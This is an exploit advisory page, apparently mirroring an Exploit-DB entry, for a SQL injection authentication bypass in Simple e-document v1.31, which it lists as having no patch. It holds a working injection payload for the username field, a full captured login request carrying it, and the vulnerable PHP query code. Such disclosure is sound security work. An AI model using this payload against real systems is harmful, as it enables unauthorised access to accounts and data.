Simple e-document v1.31 Login Bypass

vendor:

Simple e-document v1.31

by:

vinicius777

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple e-document v1.31

Affected Version From: 1.31

Affected Version To: 1.31

Patch Exists: NO

Related CWE: N/A

CPE: a:simple_e_document:simple_e_document_v_1_31

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Simple e-document v1.31 Login Bypass

A SQL injection vulnerability exists in Simple e-document v1.31, which allows an attacker to bypass authentication by sending a specially crafted username parameter. The vulnerability is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted username parameter containing malicious SQL code. This will cause the application to execute the malicious code, allowing the attacker to bypass authentication.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.

Source

Exploit-DB raw data:

##########################################################################
[+] Exploit: Simple e-document v1.31 Login Bypass                        #
[+] Author: vinicius777					                 #
[+] Contact: vinicius777 [AT] gmail @vinicius777sec                      #	
[+] version: Simple e-document v1.31			                 #
[+] Vendor Homepage: http://sourceforge.net/projects/simplee-doc/files/	 #
##########################################################################
  
 
[1] Sql Injection on username field

PoC: username=-4731' OR (2708=2708)#

# Burp output

POST /simple_e_document_v_1_31/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/simple_e_document_v_1_31/index.php
Cookie: username=-4731%27+OR+%282708%3D2708%29%23; access=3; __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; PHPSESSID=unqjr3tdi0tbgl3if801atjhl7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

username=-4731%27+OR+%282708%3D2708%29%23&password=&op=login&Submit=Login


Vulnerable Code:
[+] login.php

$username= stripslashes($_POST['username']);
$password= stripslashes($_POST['password']);
$r_password = md5($password);
$sql = "SELECT * From edocphp_users WHERE username='$username' AND password ='$r_password'";



#
#
# Greetz to g0tm1lk and TheColonial.